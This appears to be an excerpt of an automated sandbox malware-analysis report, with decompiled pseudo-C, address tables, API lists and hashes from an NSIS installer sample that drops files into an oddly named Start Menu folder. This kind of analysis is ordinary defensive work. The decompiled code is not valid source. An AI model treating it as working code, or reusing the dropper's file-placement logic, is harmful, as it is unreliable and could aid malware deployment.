                                                								__eflags = (_t53 | 0xffffffff) - _a8;
                                                								E00406234(_t85, _t109, _t114, _t114, (_t53 | 0xffffffff) - _a8);
                                                							}
                                                							L42:
                                                							_t54 = lstrlenW(_t114);
                                                							_t89 = _v8;
                                                							_t114 =  &(_t114[_t54]);
                                                							_t49 = 0x4281e0;
                                                							continue;
                                                						}
                                                						__eflags = _a8 - 0x1d;
                                                						if(_a8 != 0x1d) {
                                                							__eflags = L"kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_a8 << 0xb);
                                                							E00406212(_t114, L"kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_a8 << 0xb));
                                                						} else {
                                                							E00406159(_t114,  *0x42a248);
                                                						}
                                                						__eflags = _a8 + 0xffffffeb - 7;
                                                						if(_a8 + 0xffffffeb < 7) {
                                                							L33:
                                                							E004064A6(_t114);
                                                						}
                                                						goto L42;
                                                					}
                                                					_t112 = 2;
                                                					_t66 = GetVersion();
                                                					__eflags = _t66;
                                                					if(_t66 >= 0) {
                                                						L13:
                                                						_a8 = 1;
                                                						L14:
                                                						__eflags =  *0x42a2c4;
                                                						if( *0x42a2c4 != 0) {
                                                							_t112 = 4;
                                                						}
                                                						__eflags = _t85;
                                                						if(_t85 >= 0) {
                                                							__eflags = _t85 - 0x25;
                                                							if(_t85 != 0x25) {
                                                								__eflags = _t85 - 0x24;
                                                								if(_t85 == 0x24) {
                                                									GetWindowsDirectoryW(_t114, 0x400);
                                                									_t112 = 0;
                                                								}
                                                								while(1) {
                                                									__eflags = _t112;
                                                									if(_t112 == 0) {
                                                										goto L30;
                                                									}
                                                									_t67 =  *0x42a244;
                                                									_t112 = _t112 - 1;
                                                									__eflags = _t67;
                                                									if(_t67 == 0) {
                                                										L26:
                                                										_t69 = SHGetSpecialFolderLocation( *0x42a248,  *(_t116 + _t112 * 4 - 0x18),  &_v12);
                                                										__eflags = _t69;
                                                										if(_t69 != 0) {
                                                											L28:
                                                											 *_t114 =  *_t114 & 0x00000000;
                                                											__eflags =  *_t114;
                                                											continue;
                                                										}
                                                										__imp__SHGetPathFromIDListW(_v12, _t114);
                                                										__imp__CoTaskMemFree(_v12);
                                                										__eflags = _t69;
                                                										if(_t69 != 0) {
                                                											goto L30;
                                                										}
                                                										goto L28;
                                                									}
                                                									__eflags = _a8;
                                                									if(_a8 == 0) {
                                                										goto L26;
                                                									}
                                                									_t71 =  *_t67( *0x42a248,  *(_t116 + _t112 * 4 - 0x18), 0, 0, _t114); // executed
                                                									__eflags = _t71;
                                                									if(_t71 == 0) {
                                                										goto L30;
                                                									}
                                                									goto L26;
                                                								}
                                                								goto L30;
                                                							}
                                                							GetSystemDirectoryW(_t114, 0x400);
                                                							goto L30;
                                                						} else {
                                                							_t87 = _t85 & 0x0000003f;
                                                							E004060DF(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a278 + (_t85 & 0x0000003f) * 2, _t114, _t85 & 0x00000040); // executed
                                                							__eflags =  *_t114;
                                                							if( *_t114 != 0) {
                                                								L31:
                                                								__eflags = _v16 - 0x1a;
                                                								if(_v16 == 0x1a) {
                                                									lstrcatW(_t114, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                								}
                                                								goto L33;
                                                							}
                                                							E00406234(_t87, _t112, _t114, _t114, _v16);
                                                							L30:
                                                							__eflags =  *_t114;
                                                							if( *_t114 == 0) {
                                                								goto L33;
                                                							}
                                                							goto L31;
                                                						}
                                                					}
                                                					__eflags = _t66 - 0x5a04;
                                                					if(_t66 == 0x5a04) {
                                                						goto L13;
                                                					}
                                                					__eflags = _v16 - 0x23;
                                                					if(_v16 == 0x23) {
                                                						goto L13;
                                                					}
                                                					__eflags = _v16 - 0x2e;
                                                					if(_v16 == 0x2e) {
                                                						goto L13;
                                                					} else {
                                                						_a8 = _a8 & 0x00000000;
                                                						goto L14;
                                                					}
                                                				}
                                                				 *_t114 =  *_t114 & 0x00000000;
                                                				if(_a4 == 0) {
                                                					return _t49;
                                                				}
                                                				return E00406212(_a4, _t49);
                                                			}






























                                                0x00406234
                                                0x00406234
                                                0x00406234
                                                0x0040623a
                                                0x0040623f
                                                0x00406250
                                                0x00406250
                                                0x00406258
                                                0x00406259
                                                0x0040625a
                                                0x0040625b
                                                0x0040625e
                                                0x00406266
                                                0x00406268
                                                0x00406281
                                                0x00406284
                                                0x00406284
                                                0x00406480
                                                0x00406480
                                                0x00406486
                                                0x00000000
                                                0x00000000
                                                0x00406294
                                                0x0040629a
                                                0x00000000
                                                0x00000000
                                                0x004062a2
                                                0x004062a3
                                                0x004062a5
                                                0x004062a9
                                                0x004062ac
                                                0x0040646d
                                                0x0040647b
                                                0x0040647e
                                                0x0040647e
                                                0x0040646f
                                                0x00406472
                                                0x00406475
                                                0x00406477
                                                0x00406477
                                                0x00000000
                                                0x0040646d
                                                0x004062b2
                                                0x004062b5
                                                0x004062c4
                                                0x004062ca
                                                0x004062cd
                                                0x004062d0
                                                0x004062da
                                                0x004062df
                                                0x004062e1
                                                0x004062e5
                                                0x004062e8
                                                0x004062eb
                                                0x004062ee
                                                0x0040640e
                                                0x00406412
                                                0x00406447
                                                0x0040644b
                                                0x00406450
                                                0x00406455
                                                0x00406455
                                                0x0040645a
                                                0x0040645b
                                                0x00406460
                                                0x00406463
                                                0x00406466
                                                0x00000000
                                                0x00406466
                                                0x00406414
                                                0x00406418
                                                0x0040642e
                                                0x00406435
                                                0x0040641a
                                                0x00406421
                                                0x00406421
                                                0x00406440
                                                0x00406443
                                                0x00406406
                                                0x00406407
                                                0x00406407
                                                0x00000000
                                                0x00406443
                                                0x004062f6
                                                0x004062f7
                                                0x004062fd
                                                0x004062ff
                                                0x00406319
                                                0x00406319
                                                0x00406320
                                                0x00406320
                                                0x00406327
                                                0x0040632b
                                                0x0040632b
                                                0x0040632c
                                                0x0040632e
                                                0x0040636a
                                                0x0040636d
                                                0x0040637d
                                                0x00406380
                                                0x00406388
                                                0x0040638e
                                                0x0040638e
                                                0x004063eb
                                                0x004063eb
                                                0x004063ed
                                                0x00000000
                                                0x00000000
                                                0x00406392
                                                0x00406399
                                                0x0040639a
                                                0x0040639c
                                                0x004063b6
                                                0x004063c4
                                                0x004063ca
                                                0x004063cc
                                                0x004063e7
                                                0x004063e7
                                                0x004063e7
                                                0x00000000
                                                0x004063e7
                                                0x004063d2
                                                0x004063dd
                                                0x004063e3
                                                0x004063e5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004063e5
                                                0x0040639e
                                                0x004063a1
                                                0x00000000
                                                0x00000000
                                                0x004063b0
                                                0x004063b2
                                                0x004063b4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004063b4
                                                0x00000000
                                                0x004063eb
                                                0x00406375
                                                0x00000000
                                                0x00406330
                                                0x00406332
                                                0x0040634d
                                                0x00406352
                                                0x00406356
                                                0x004063f5
                                                0x004063f5
                                                0x004063f9
                                                0x00406401
                                                0x00406401
                                                0x00000000
                                                0x004063f9
                                                0x00406360
                                                0x004063ef
                                                0x004063ef
                                                0x004063f3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004063f3
                                                0x0040632e
                                                0x00406301
                                                0x00406305
                                                0x00000000
                                                0x00000000
                                                0x00406307
                                                0x0040630b
                                                0x00000000
                                                0x00000000
                                                0x0040630d
                                                0x00406311
                                                0x00000000
                                                0x00406313
                                                0x00406313
                                                0x00000000
                                                0x00406313
                                                0x00406311
                                                0x0040648c
                                                0x00406497
                                                0x004064a3
                                                0x004064a3
                                                0x00000000

                                                APIs
                                                • GetVersion.KERNEL32(00000000,00422708,?,004053A8,00422708,00000000,00000000,00000000), ref: 004062F7
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406375
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406388
                                                • SHGetFolderPathW.SHELL32(?,00000000,00000000,Call), ref: 004063B0
                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004063C4
                                                • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004063D2
                                                • CoTaskMemFree.OLE32(?), ref: 004063DD
                                                • lstrcatW.KERNEL32 ref: 00406401
                                                • lstrlenW.KERNEL32(Call,00000000,00422708,?,004053A8,00422708,00000000,00000000,00000000), ref: 0040645B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: DirectoryFolderPath$FreeFromListLocationSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                                • API String ID: 3575957451-3610614223
                                                • Opcode ID: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                • Instruction ID: 8986ea92d4020f82ea273b0cadebf120af401304848ce5cddb84501886c13395
                                                • Opcode Fuzzy Hash: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                • Instruction Fuzzy Hash: C661E371A00115EBDB209F24CD40AAE37A5AF50314F52817FE947BA2D0D73D8AA6CB9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 828 40176f-401794 call 402c53 call 405c3d 833 401796-40179c call 406212 828->833 834 40179e-4017b0 call 406212 call 405bc6 lstrcatW 828->834 840 4017b5-4017b6 call 4064a6 833->840 834->840 843 4017bb-4017bf 840->843 844 4017c1-4017cb call 406555 843->844 845 4017f2-4017f5 843->845 853 4017dd-4017ef 844->853 854 4017cd-4017db CompareFileTime 844->854 847 4017f7-4017f8 call 405dc2 845->847 848 4017fd-401819 call 405de7 845->848 847->848 855 40181b-40181e 848->855 856 40188d-4018b6 call 405371 call 40317b 848->856 853->845 854->853 857 401820-40185e call 406212 * 2 call 406234 call 406212 call 405957 855->857 858 40186f-401879 call 405371 855->858 870 4018b8-4018bc 856->870 871 4018be-4018ca SetFileTime 856->871 857->843 891 401864-401865 857->891 868 401882-401888 858->868 872 402ae4 868->872 870->871 874 4018d0-4018db CloseHandle 870->874 871->874 875 402ae6-402aea 872->875 877 4018e1-4018e4 874->877 878 402adb-402ade 874->878 880 4018e6-4018f7 call 406234 lstrcatW 877->880 881 4018f9-4018fc call 406234 877->881 878->872 886 401901-4022fc call 405957 880->886 881->886 886->875 891->868 893 401867-401868 891->893 893->858
                                                C-Code - Quality: 77%
                                                			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                				void* __edi;
                                                				void* _t35;
                                                				void* _t43;
                                                				void* _t45;
                                                				FILETIME* _t51;
                                                				FILETIME* _t64;
                                                				void* _t66;
                                                				signed int _t72;
                                                				FILETIME* _t73;
                                                				FILETIME* _t77;
                                                				signed int _t79;
                                                				void* _t81;
                                                				void* _t82;
                                                				WCHAR* _t84;
                                                				void* _t86;
                                                
                                                				_t77 = __ebx;
                                                				 *(_t86 - 8) = E00402C53(0x31);
                                                				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
                                                				_t35 = E00405C3D( *(_t86 - 8));
                                                				_push( *(_t86 - 8));
                                                				_t84 = L"Call";
                                                				if(_t35 == 0) {
                                                					lstrcatW(E00405BC6(E00406212(_t84, L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93\\Vatersotiges\\Knoglemarvsundersgelsen\\Armoniac")), ??);
                                                				} else {
                                                					E00406212();
                                                				}
                                                				E004064A6(_t84);
                                                				while(1) {
                                                					__eflags =  *(_t86 + 8) - 3;
                                                					if( *(_t86 + 8) >= 3) {
                                                						_t66 = E00406555(_t84);
                                                						_t79 = 0;
                                                						__eflags = _t66 - _t77;
                                                						if(_t66 != _t77) {
                                                							_t73 = _t66 + 0x14;
                                                							__eflags = _t73;
                                                							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                						__eflags = _t72;
                                                						 *(_t86 + 8) = _t72;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) == _t77) {
                                                						E00405DC2(_t84);
                                                					}
                                                					__eflags =  *(_t86 + 8) - 1;
                                                					_t43 = E00405DE7(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                					__eflags = _t43 - 0xffffffff;
                                                					 *(_t86 - 0x30) = _t43;
                                                					if(_t43 != 0xffffffff) {
                                                						break;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) != _t77) {
                                                						E00405371(0xffffffe2,  *(_t86 - 8));
                                                						__eflags =  *(_t86 + 8) - 2;
                                                						if(__eflags == 0) {
                                                							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                						}
                                                						L31:
                                                						 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t86 - 4));
                                                						__eflags =  *0x42a2c8;
                                                						goto L32;
                                                					} else {
                                                						E00406212("C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp", _t81);
                                                						E00406212(_t81, _t84);
                                                						E00406234(_t77, _t81, _t84, "C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
                                                						E00406212(_t81, "C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp");
                                                						_t64 = E00405957("C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
                                                						__eflags = _t64;
                                                						if(_t64 == 0) {
                                                							continue;
                                                						} else {
                                                							__eflags = _t64 == 1;
                                                							if(_t64 == 1) {
                                                								 *0x42a2c8 =  &( *0x42a2c8->dwLowDateTime);
                                                								L32:
                                                								_t51 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_push(_t84);
                                                								_push(0xfffffffa);
                                                								E00405371();
                                                								L29:
                                                								_t51 = 0x7fffffff;
                                                							}
                                                						}
                                                					}
                                                					L33:
                                                					return _t51;
                                                				}
                                                				E00405371(0xffffffea,  *(_t86 - 8));
                                                				 *0x42a2f4 =  *0x42a2f4 + 1;
                                                				_t45 = E0040317B(_t79,  *((intOrPtr*)(_t86 - 0x20)),  *(_t86 - 0x30), _t77, _t77); // executed
                                                				 *0x42a2f4 =  *0x42a2f4 - 1;
                                                				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
                                                				_t82 = _t45;
                                                				if( *(_t86 - 0x1c) != 0xffffffff) {
                                                					L22:
                                                					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
                                                				} else {
                                                					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
                                                					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
                                                						goto L22;
                                                					}
                                                				}
                                                				CloseHandle( *(_t86 - 0x30)); // executed
                                                				__eflags = _t82 - _t77;
                                                				if(_t82 >= _t77) {
                                                					goto L31;
                                                				} else {
                                                					__eflags = _t82 - 0xfffffffe;
                                                					if(_t82 != 0xfffffffe) {
                                                						E00406234(_t77, _t82, _t84, _t84, 0xffffffee);
                                                					} else {
                                                						E00406234(_t77, _t82, _t84, _t84, 0xffffffe9);
                                                						lstrcatW(_t84,  *(_t86 - 8));
                                                					}
                                                					_push(0x200010);
                                                					_push(_t84);
                                                					E00405957();
                                                					goto L29;
                                                				}
                                                				goto L33;
                                                			}


















                                                0x0040176f
                                                0x00401776
                                                0x00401782
                                                0x00401785
                                                0x0040178a
                                                0x0040178d
                                                0x00401794
                                                0x004017b0
                                                0x00401796
                                                0x00401797
                                                0x00401797
                                                0x004017b6
                                                0x004017bb
                                                0x004017bb
                                                0x004017bf
                                                0x004017c2
                                                0x004017c7
                                                0x004017c9
                                                0x004017cb
                                                0x004017d0
                                                0x004017d0
                                                0x004017db
                                                0x004017db
                                                0x004017ec
                                                0x004017ee
                                                0x004017ee
                                                0x004017ef
                                                0x004017ef
                                                0x004017f2
                                                0x004017f5
                                                0x004017f8
                                                0x004017f8
                                                0x004017ff
                                                0x0040180e
                                                0x00401813
                                                0x00401816
                                                0x00401819
                                                0x00000000
                                                0x00000000
                                                0x0040181b
                                                0x0040181e
                                                0x00401874
                                                0x00401879
                                                0x004015b6
                                                0x004028a1
                                                0x004028a1
                                                0x00402adb
                                                0x00402ade
                                                0x00402ade
                                                0x00000000
                                                0x00401820
                                                0x00401826
                                                0x0040182d
                                                0x0040183a
                                                0x00401845
                                                0x0040185b
                                                0x0040185b
                                                0x0040185e
                                                0x00000000
                                                0x00401864
                                                0x00401864
                                                0x00401865
                                                0x00401882
                                                0x00402ae4
                                                0x00402ae4
                                                0x00402ae4
                                                0x00401867
                                                0x00401867
                                                0x00401868
                                                0x00401493
                                                0x004022f7
                                                0x004022f7
                                                0x004022f7
                                                0x00401865
                                                0x0040185e
                                                0x00402ae6
                                                0x00402aea
                                                0x00402aea
                                                0x00401892
                                                0x00401897
                                                0x004018a5
                                                0x004018aa
                                                0x004018b0
                                                0x004018b4
                                                0x004018b6
                                                0x004018be
                                                0x004018ca
                                                0x004018b8
                                                0x004018b8
                                                0x004018bc
                                                0x00000000
                                                0x00000000
                                                0x004018bc
                                                0x004018d3
                                                0x004018d9
                                                0x004018db
                                                0x00000000
                                                0x004018e1
                                                0x004018e1
                                                0x004018e4
                                                0x004018fc
                                                0x004018e6
                                                0x004018e9
                                                0x004018f2
                                                0x004018f2
                                                0x00401901
                                                0x00401906
                                                0x004022f2
                                                0x00000000
                                                0x004022f2
                                                0x00000000

                                                APIs
                                                • lstrcatW.KERNEL32 ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                  • Part of subcall function 00405371: lstrcatW.KERNEL32 ref: 004053CC
                                                  • Part of subcall function 00405371: SetWindowTextW.USER32 ref: 004053DE
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsp5B93.tmp$C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac$Call
                                                • API String ID: 1941528284-2966689892
                                                • Opcode ID: 4b4fd6f5ecf2900afcae32528c4112f55eb1a5073c8ee7446931cab05ab2727e
                                                • Instruction ID: 0d28a5e8dae66ca407d9ab1903032e249cf50254bac70f3abe216f7737186e0f
                                                • Opcode Fuzzy Hash: 4b4fd6f5ecf2900afcae32528c4112f55eb1a5073c8ee7446931cab05ab2727e
                                                • Instruction Fuzzy Hash: 0541B131900119BACF217BA5CD45DAF3A79EF01368B20427FF422B10E1DB3C8A519A6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 894 402660-402679 call 402c31 897 402adb-402ade 894->897 898 40267f-402686 894->898 899 402ae4-402aea 897->899 900 402688 898->900 901 40268b-40268e 898->901 900->901 903 4027f2-4027fa 901->903 904 402694-4026a3 call 406172 901->904 903->897 904->903 907 4026a9 904->907 908 4026af-4026b3 907->908 909 402748-40274b 908->909 910 4026b9-4026d4 ReadFile 908->910 912 402763-402773 call 405e6a 909->912 913 40274d-402750 909->913 910->903 911 4026da-4026df 910->911 911->903 916 4026e5-4026f3 911->916 912->903 922 402775 912->922 913->912 914 402752-40275d call 405ec8 913->914 914->903 914->912 919 4026f9-40270b MultiByteToWideChar 916->919 920 4027ae-4027ba call 406159 916->920 919->922 923 40270d-402710 919->923 920->899 925 402778-40277b 922->925 926 402712-40271d 923->926 925->920 928 40277d-402782 925->928 926->925 929 40271f-402744 SetFilePointer MultiByteToWideChar 926->929 930 402784-402789 928->930 931 4027bf-4027c3 928->931 929->926 932 402746 929->932 930->931 935 40278b-40279e 930->935 933 4027e0-4027ec SetFilePointer 931->933 934 4027c5-4027c9 931->934 932->922 933->903 936 4027d1-4027de 934->936 937 4027cb-4027cf 934->937 935->903 938 4027a0-4027a6 935->938 936->903 937->933 937->936 938->908 939 4027ac 938->939 939->903
                                                C-Code - Quality: 83%
                                                			E00402660(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
                                                				intOrPtr _t65;
                                                				intOrPtr _t66;
                                                				intOrPtr _t72;
                                                				void* _t76;
                                                				void* _t79;
                                                
                                                				_t72 = __edx;
                                                				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                				_t65 = 2;
                                                				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
                                                				_t66 = E00402C31(_t65);
                                                				_t79 = _t66 - 1;
                                                				 *((intOrPtr*)(_t76 - 0x50)) = _t72;
                                                				 *((intOrPtr*)(_t76 - 0x38)) = _t66;
                                                				if(_t79 < 0) {
                                                					L36:
                                                					 *0x42a2c8 =  *0x42a2c8 +  *(_t76 - 4);
                                                				} else {
                                                					__ecx = 0x3ff;
                                                					if(__eax > 0x3ff) {
                                                						 *(__ebp - 0x38) = 0x3ff;
                                                					}
                                                					if( *__esi == __bx) {
                                                						L34:
                                                						__ecx =  *(__ebp - 0xc);
                                                						__eax =  *(__ebp - 8);
                                                						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                						if(_t79 == 0) {
                                                							 *(_t76 - 4) = 1;
                                                						}
                                                						goto L36;
                                                					} else {
                                                						 *(__ebp - 0x30) = __ebx;
                                                						 *(__ebp - 0x10) = E00406172(__ecx, __esi);
                                                						if( *(__ebp - 0x38) > __ebx) {
                                                							do {
                                                								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
                                                									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405EC8( *(__ebp - 0x10), __ebx) >= 0) {
                                                										__eax = __ebp - 0x44;
                                                										if(E00405E6A( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
                                                											goto L34;
                                                										} else {
                                                											goto L21;
                                                										}
                                                									} else {
                                                										goto L34;
                                                									}
                                                								} else {
                                                									__eax = __ebp - 0x40;
                                                									_push(__ebx);
                                                									_push(__ebp - 0x40);
                                                									__eax = 2;
                                                									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
                                                									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
                                                									if(__eax == 0) {
                                                										goto L34;
                                                									} else {
                                                										__ecx =  *(__ebp - 0x40);
                                                										if(__ecx == __ebx) {
                                                											goto L34;
                                                										} else {
                                                											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                											 *(__ebp - 0x48) = __ecx;
                                                											 *(__ebp - 0x44) = __eax;
                                                											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                												L28:
                                                												__ax & 0x0000ffff = E00406159( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                											} else {
                                                												__ebp - 0x44 = __ebp + 0xa;
                                                												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
                                                													L21:
                                                													__eax =  *(__ebp - 0x44);
                                                												} else {
                                                													__esi =  *(__ebp - 0x48);
                                                													__esi =  ~( *(__ebp - 0x48));
                                                													while(1) {
                                                														_t22 = __ebp - 0x40;
                                                														 *_t22 =  *(__ebp - 0x40) - 1;
                                                														__eax = 0xfffd;
                                                														 *(__ebp - 0x44) = 0xfffd;
                                                														if( *_t22 == 0) {
                                                															goto L22;
                                                														}
                                                														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
                                                														__esi = __esi + 1;
                                                														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
                                                														__ebp - 0x44 = __ebp + 0xa;
                                                														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x44, 1) == 0) {
                                                															continue;
                                                														} else {
                                                															goto L21;
                                                														}
                                                														goto L22;
                                                													}
                                                												}
                                                												L22:
                                                												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                													goto L28;
                                                												} else {
                                                													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
                                                														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
                                                															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
                                                															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
                                                														} else {
                                                															__ecx =  *(__ebp - 0xc);
                                                															__edx =  *(__ebp - 8);
                                                															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                														}
                                                														goto L34;
                                                													} else {
                                                														__ecx =  *(__ebp - 0xc);
                                                														__edx =  *(__ebp - 8);
                                                														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                														 *(__ebp - 0x30) = __eax;
                                                														if(__ax == __bx) {
                                                															goto L34;
                                                														} else {
                                                															goto L26;
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L37;
                                                								L26:
                                                								__eax =  *(__ebp - 8);
                                                							} while ( *(__ebp - 8) <  *(__ebp - 0x38));
                                                						}
                                                						goto L34;
                                                					}
                                                				}
                                                				L37:
                                                				return 0;
                                                			}








                                                0x00402660
                                                0x00402662
                                                0x00402665
                                                0x00402667
                                                0x0040266a
                                                0x0040266f
                                                0x00402673
                                                0x00402676
                                                0x00402679
                                                0x00402adb
                                                0x00402ade
                                                0x0040267f
                                                0x0040267f
                                                0x00402686
                                                0x00402688
                                                0x00402688
                                                0x0040268e
                                                0x004027f2
                                                0x004027f2
                                                0x004027f5
                                                0x004027fa
                                                0x004015b6
                                                0x004028a1
                                                0x004028a1
                                                0x00000000
                                                0x00402694
                                                0x00402695
                                                0x004026a0
                                                0x004026a3
                                                0x004026af
                                                0x004026b3
                                                0x0040274b
                                                0x00402763
                                                0x00402773
                                                0x00000000
